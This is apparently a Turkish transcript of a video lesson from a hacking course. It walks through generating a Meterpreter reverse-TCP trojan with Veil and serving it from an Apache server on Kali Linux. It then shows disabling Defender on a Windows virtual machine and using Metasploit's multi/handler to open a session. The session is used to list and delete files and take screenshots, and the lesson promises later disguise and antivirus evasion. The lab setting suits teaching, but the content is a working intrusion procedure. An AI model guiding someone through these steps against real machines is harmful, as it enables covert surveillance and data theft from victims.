Arkadaşlar merhaba. Bu bölümde oluşturduğumuz Trojan'ı nasıl dinleyebiliriz bunu konuşalım. Ama öncesinde yeni bir payload oluşturacağım. Bazı arkadaşlar hata mesajı almış. Onun da çözümünü göstermiş olayım. Veil yazıp framework'ümü çalıştırıyorum. Sonrasında use 1 deyip evasion aracını seçtim. List deyip buradan herhangi bir payload türünü seçmem gerekiyor. Buradan 139 deyip Ruby Meterpreter Reverse TCP seçiyorum. Sonrasındaki adım buradaki set el host ayarlamak olacak. Kendi IP adresimi gireceğim. Ne olur ne olmaz diye buradan bir kontrol ediyorum. 10.0.2.9 set el port 80 80 yapıyorum. Sonrasında da generate diyerek Trojan'ımı oluşturuyorum. Bir isim vermem gerekiyor. Buna da Fatma diyelim. Şimdi şöyle bir hata aldığımızda ne yapmamız gerekiyor bunu göstereceğim. Öncesinde enter deyip burayı kapatıyorum. Hatta buradan tamamen çıkabilirim. Buraya geldikten sonra biraz da yazımı büyütsem iyi olur. Sırasıyla chmod mod artı 777 Warlip Veil Wine. Bu dosya dizilini girmeniz gerekiyor. Bunu girdikten sonra Enter'a basın. Tabi diyor ki e, izniniz yok. Bu yüzden su dosu diyerek yetkimi de yükseltiyorum. Yine aynı şekilde CH modu çalıştıracağım. Onun dışında bir de chmod mod artı RW rwx, rwx, X yazarak bunu 3 defa tekrarlıyorum. Tekrardan var, lip, wheel, wine dosya dizilini seçiyorum. Enter'a bastığımda bunun da ayarını şu an benim için yaptım. Sonra root yetkisindeyken clear yapıp temizliyorum. Wheel'i tekrardan çalıştırıyorum. 101, list, 139. Set al host 10.0.2.9 Set al port 8080 Şimdi generate diyeceğim. Ve bir isim vereceğim. 3A'lı Fatma'yı oluşturalım. Bakın bu sefer de oluşturma aşamalarını bana gösterdi. Dosyam da burada oluştu. Yani hata alırsanız bu yöntemi izleyebilirsiniz. Dosyamın konumunu zaten biliyorduk. Buradaki var klasörü içerisinde lib de içerisinde bulunuyor. Şimdi buradan geliyorum. Önce bir file sisteme girdim. Var. Buradan lib build output ve son olarak da compile giriyorum. Burada oluşturduğum backdoor dosyamı trojan dosyamı buldum. Şimdi onu buradan kopyalayayım ve buraya yapıştırayım. Şu anda dosyam da burada. Şimdi mantıkken biz bu dosyayı oluşturduğumuzda bir hedef bilgisayarı dinleyebilmemiz için bunun o bilgisayarda çalıştırılmış olması gerekiyor. Yani kişi gelecek, bunu indirecek ve çift tıklayacak. Bunu yaptığında bilgisayarı dinleyebiliyoruz. Şu aşamada bunun çok basit bir dosya görünümünde olduğunu farkındayım. Bunun zaten ileride uzantısını değiştireceğiz. Sonrasında buraya bir ikon, bir simge ekleyeceğiz. Merak etmeyin şu an temel seviyede olduğumuz için kafanıza takmanıza gerek yok. Fakat şimdilik de şöyle bir şey göstermek istiyorum. Normalde bizim bilgisayarımıza virüsler nasıl bulaşır? Bir siteye gideriz. Herkese açık public bir siteye gideriz. Oradan rastgele bir dosya indiririz. O dosyaya tıkladığımızda aslında o bizim işimize yarayacak bir dosya değildir bilgisayarımıza virüs bulaşır. Antivirüs programını atlatırsa izlenebiliriz, verilerimizi çaldırabiliriz. Ama bunların hepsi temelinde dış ağda gerçekleştirilen saldırılar. Ben bu ağda hem size Kali Linux'ta web sunucusunu çalıştırmayı göstermek için hem de biraz daha iyi pratik yapabilmek için bu ders kapsamında kendi ağım üzerinde saldırı yapacağım. O yüzden şimdi buradan terminali açmanızı istiyorum. Buraya gelip service Apache to start demenizi istiyorum. Bunu dediğinizde yine bir yetki yükseltmemi istedi. Kal yazdım. Şu anda bu servis çalışır duruma geldi. Peki bu Apache to servisini biz çalıştırdığımızda ne oluyor arka planda? Şöyle bir şey. Bizim zaten IP adresimiz belli. Bu IP adresinin aynısını gelip buraya yazdığımda benim Kali Linux'umun bu ağ içerisindeki cihazlara bir web yayını yaptığını görüyorum. Bu web yayının da aslında biz düzenleyebiliriz, farklı formlara sokabiliriz. Ama şu anlık bununla bir işimiz yok. Bunu oluşturma sebebimiz aslında bu dosyayı hedef bilgisayara iletmek. Peki bu sunucu nereden yayınlanıyor? File sisteme girdim. Var www. html'in altında bir index dosyası var. Buradaki gördüğünüz HTML kodları da o index dosyasının içerisindeki scriptlerden oluşuyor. İsterseniz HTML bilginiz varsa buraya da düzenleyebilirsiniz. Ama şimdilik şundan dolayı gösterdim. Ben oluşturduğum bu hatma nokta vereceğim. Buradaki www'nin olduğu yere atacağım. Ama öncesinde html'e giriyorum ve buraya fatma.exe dosyasını sürüklüyorum. Sürüklememesinin sebebi muhtemelen şu ama yine de bu şekilde deneyeyim. Bakın open as root, root olun diyor. Yetkimi yükselttikten sonra tekrardan buraya yapıştırabildim. Ben şu anda aslında şöyle bir işlem gerçekleştirdim. Ben buraya geldikten sonra oluşturduğum exe dosyasını yazarsam Bunu indirmeye başlıyor. Fakat şöyle bir sıkıntı var. Genellikle biz böyle exe dosyalarını bir yerden indirirken vesaire, o dosya zip formunda indirilir. Neden? Çünkü Google'un kendisi dahi exe dosyasını indirirken sıkıntı çıkarabiliyor. Şöyle bir şey yapacağım. Şimdi önce burada bir klasör oluşturmak istiyorum. Adını da Fatma koydum. Bu oluşturduğum Trojan'ı bunun içerisine önce bir attım. Yani bir klasörün içerisinde dosyam şu anda. Bu klasörü de benim zip'e dönüştürmem lazım. Paladinux'ta da biz zip oluşturabilmek için şu komutu kullanıyoruz. Buraya gelip önce bir ls yazıyorum. Neden ls yazdım? Çünkü buradaki klasörümün olduğu dizine gitmem lazım. Masa üstünde olduğu için cd desktop yazdım. Ve buradayken zip boşluk trele yazıyorum. Sonrasında oluşturmak istediğim zipin ismini yazıyorum. Fatma.zip olsun. Ardından bu zipin içerisine atacağım klasörün ismini giriyorum. Ve benim için şu anda zip dosyasını oluşturdu. İçeriğini de burada gösterdi. Fatma diye bir klasör var. Bu klasörün içerisinde de Fatma.exe diye bir dosya var diyor. Şimdi gelip ben yine buradaki HTML dizinin içerisine bu zipi atacağım. Kopyala dedim. Zaten root'um. O yüzden direkt yapıştırabilirim. Şimdi benim zip dosyam burada. Buraya geliyorum. Fatma.zip diyorum. Bakın bunu bu şekilde indirebildim. Şuradan açtığımda da içeriğini görebiliyorum. Şimdi ben bunu hedef bilgisayarda nasıl çalıştıracağım? Bakın ben şurada bir sanal makine oluşturdum. Şuradan açabilirsem. Windows sanal makinemi kurdum. Neden kendi makineme atamıyorum? Şundan dolayı atamıyorum. Bir sanal ağ oluşturduğumuz için buradaki gerçek ağımız üzerinde bir paylaşım yapamıyoruz. Bunu yapabilmek için bir Wi-Fi kart bağlayabilirsiniz ya da benim yaptığım gibi burada sanal makine oluşturabilirsiniz. İnternette bir sürü videosu var. Burada opsiyonel olarak sunuyorum. İsteyen bu videoyu izleyebilir. İsteyen dışa kısmındaki videoları izleyebilir. Zaten bizim için asıl önemli olan da bu. Fakat şimdilik bir test aşamasında olduğumuz için böyle bir sanal makine oluşturdum. Şimdi Microsoft Edge'i buradan açıyorum. 10.0.2.9'u burada çalıştırdığımda Hariden yaptığım yayını burada da görebiliyorum. Aynı şekilde dosya ismini de buraya yazıp Enter diyorum. Şimdi arkadaşlar şöyle bir şey. Şimdi bu virüs algılanma olayını söyleyeceğim. Bu yaptığımız işlemler biraz senaryosal. Bunun farkındayım. Ama zaten şu anda bir temel eğitim aldığımız için önemli olan burada çalışma mantığını anlamak. Mesela bir mülakatta gidip de hani böyle bir soru sormazlar ama oldu ki sordular diyelim web sunucusunu nasıl çalıştırırsın diye. Ya Bilmezseniz olmaz. O yüzden bunu da çalıştırmayı gördük. Şimdi bu dosyayı indirmeyi denedim ben ama indirmedi. Neden indirmedi? Çünkü virüs algıladı. İşte böyle hazır araçları kullanmanın da olumsuz yönü bu. Bunu çalıştırabilmek için şuradan geleceğim. Microsoft Defender'ı kapatacağım. Ayarları yönet deyip buradan gerçek zamanlı korumayı kapatıyorum. Sonrasında tekrardan Microsoft Edge'e girip Fatma.zip yazıp dosyamı indirebilirim. Bakın bu sefer indi. Ama bazen sizde Defender bunu yakalayamayabilir. Dediğim gibi gidip farklı PLO türlerini kullanabilirsiniz. Veya gidip kendinizde bir Trojan yazabilirsiniz. Şimdi biz bunu buraya indirdik. Ne yapalım? Şöyle şuradan açalım bir. Daha iyi olur. Fatma'nın içerisinde bulunan exe dosyasını görüyorum. Şimdi bunu çalıştıracağım. Şöyle de bir imaj eklemiş kendi. Bunu biz verilemedik. Ben bunu çalıştırdığımda istediğim şey benim bilgisayarıma bir bağlantı düşmesi. Fakat bunu buradan çalıştırırsam direkt gidip benim Kali Linux'umda bir ekran açılmayacak. Yine terminal üzerinden kontrol sağlayacağım. Ama bu kontrolü sağlayabilmek için de buraya geldikten sonra önce bir yeni terminal açıyorum. Buraya gelip msf console yazıyorum. msf console'da biz ne yapıyorduk? Meterpreter sessionlarını kullanarak hedef bilgisayar üzerinde Detaylı erişim sağlayabiliyorduk. Önceki emme videolarını izlemediyseniz de sıkıntı değil. Buradan detaylıca anlayabilirsiniz. Şimdi buraya geldikten sonra use slash exploit slash multi slash handler yazıyorum. Bu modül aslında bizim kendi projemizleri izleyebilmemiz için oluşturulmuş bir modül. Çok fonksiyonlu bir modül. Enter'a bastığımda şu anda bu modülün içerisine girdim. Şimdi Şöyle bir şey yapacağım. Show Options diyeceğim. Bunu yaptığımda bakın burada şu anda aktif olarak kullanılan payload türünü bana gösterdi. Bunu benim değiştirmem gerekiyor. Neden değiştirmem gerekiyor? Birincisi ben Windows üzerinde çalışma yapıyorum. İkincisi benim bağlantı türüm SQL Reverse TCP değil. Artı olarak ben Meterpreter'ı kullanmak istiyorum. Ne yapıyorduk? Show payload deyip... Hangi payload türlerini kullanabileceğimizi görüyorduk. Buradan ctrl-shift-f ile Windows, Meterpreter ve Reverse TCP yazıyorum. Bunu kullanacağım. Bunu kullanabilmek için de şöyle yapmam yeterli. Temizliyorum. Tekrardan Show Options çalıştırıyorum. Amacım bunu değiştirmek. Set. Payload yazdıktan sonra bunu Windows Meterpreter Reverse TCP olarak seçiyorum. Burada Reverse TCP seçmemin amacı bizim oluşturduğumuz trojanı hazırlarken Reverse TCP, ters TCP bağlantısını kullanmamış olmamız. Şimdi Enter dediğimde Payload'u ben bu şekilde ayarladım diyor. Show Options diyorum. Evet şu anda istediğim payload'u kullanıyorum. Ardından buradaki Lhost'a ve portu da değiştirmem lazım. Set Lhost deyip kendi IP adresimi giriyorum. Ardından set Lport deyip Trojan'ı oluştururken kullandığım port adresini yazıyorum. Ve enter'a basıyorum. Şimdi tekrardan bir show options çalıştırayım. Evet şu anda ayarları istediğim gibi yaptım. Ondan sonra ne yapıyorduk? Exploit diyerek dinlemeye geçiyorduk. Şu anda benim için bir dinleme bağlantısı oluşturmasını isteyeceğim. Bakın dedi ki ben 8080 portunda şu anda bir bağlantı sağlıyorum sana diyor. Burayı dinliyorum eğer buradan bir veri gelirse bana sana göstereceğim diyor. Şimdi buraya geldim. Fatma dosyasının üzerine çift tıkladım. Şöyle bir bilgi mesajı veriyor. Bu yine hazır bir araçla virüsü oluşturmamızdan dolayı kaynaklanıyor. Ek bir deyip yine de çalıştır diyorum. Buraya geldim ve bakın bana dedi ki ben bir tane session açtım sana dedi. Clear çalıştıramıyorduk burada. Şöyle yapacağım. Tam ekranı alacağım. Şimdi biz MetaPreator'ı kullanarak neler yapabiliyorduk? Öncesinde o hedef bilgisayar üzerindeki dosyaları görebiliyorduk. Mesela şöyle bir şey yapsam, helplesem, içeride çalıştırabileceğim komutları görüyorum. Şu anda bu bilgisayarın içerisindeki Dosyaları ben buradaki komutları kullanarak bulabilirim, izleyebilirim de screenshot alabilirim. Örneğin siz info çalıştırıyorum. Bakın Windows 10 üzerinde bağlantı açtığını burada söyledi. Sonrasında mesela ifconfig çalıştıralım. Karşı bilgisayarın IP adresini görelim. 10.0.2.13 olduğunu da gördüm. Who am diyelim. Bunu kullanamıyormuşuz. Şöyle bir şey yapalım. You Uname de A yapalım. Muhtemelen Metaprater içerisinde olan komutlar olmadığı için göstermiyor ama bakın burada ls kullanabiliyoruz, move kullanabiliyoruz vesaire vesaire. Mesela ls dediğimde bulunduğum dizindeki dosyaları görebiliyorum. cd nokta nokta deyip geri çıkayım. ls çalıştırayım. Bir daha cd nokta nokta diyorum. Bakın tüm dosyaları görebiliyorum. Burada istediğim bir şeyleri silebilirim. Ama asıl ilginizi çekeceğini düşündüğüm şey şu. Ee, bakalım bir ekran görüntüsü alabiliyor muyuz biz bu bilgisayardan? Buraya gelip tek yapmam gereken screenshot yazmak. Bunu yazdıktan sonra Enter'a bastığımda screenshot yani ekran görüntüsü şu adrese kaydedildi diyor. Hemen o adrese bir gideyim bakayım. File System. Palin içerisinde buraya kaydetti. Şöyle bir ekran görüntüsü var mı şu anda hedef bilgisayar üzerinde? Şurada alttan bakalım. Evet tamamen aynı görüntü. Yani ekran görüntüsü de uzaktan alabiliyorum. Terminalime tekrardan geleceğim. Şimdi hangisi? Kusura bakmayın en sondakiymiş. Örneğin bu bilgisayarın bir web webcam'i olsaydı, hatta ben webcam'imi VirtualBox üzerinde tanıtsaydım, görüntü de alabilecektik. Fakat sanal makine olduğu için herhangi bir USB bağlantısı gözükmeyecektir muhtemelen. Ama yine de bir göstereyim. Burada webcam list, webcam chat diye komutlar var. Şöyle yapacağım. Bakayım webcam list çalıştırabiliyor muyum? Yanlış yazdım. Tekrardan şöyle bir webcam list yazayım. Enter'a bastım da webcam bulunamadı diyor. Yani siz isterseniz burada çeşitli komutları kullanarak detaylı taramalar yapabilirsiniz. Şimdi benim bunları gösterme amacım şu. Birincisi kendi ağımda çalıştırdım, bir web sunucusu oluşturdum. Kim gelip benim web sunucuma bağlanacak da bir şeyler indirecek? Orası zaten ayrı bir muamma. Artı olarak antivirüs programına yakalandım, direkt Microsoft'un kendi Defender'ına yakalandım. O da ayrı bir sorun. Bunları nasıl çözeceğiz? Şu şekilde çözeceğiz. Öncesinde iyi bir Python programlama dili bilgisine sahip olmamız gerekiyor. Aslında böyle çok uzman seviyesinde olmamıza gerek yok. Fakat Python'un siber güvenlik için oluşturulmuş kütüphanelerine hakim olmamız önemli. Onun dışında çeşitli ücretli araçları kullanarak da böyle trojanlar oluşturabilirsiniz. Şimdi burada bırakacağım. Bir sonraki videoda devam edelim.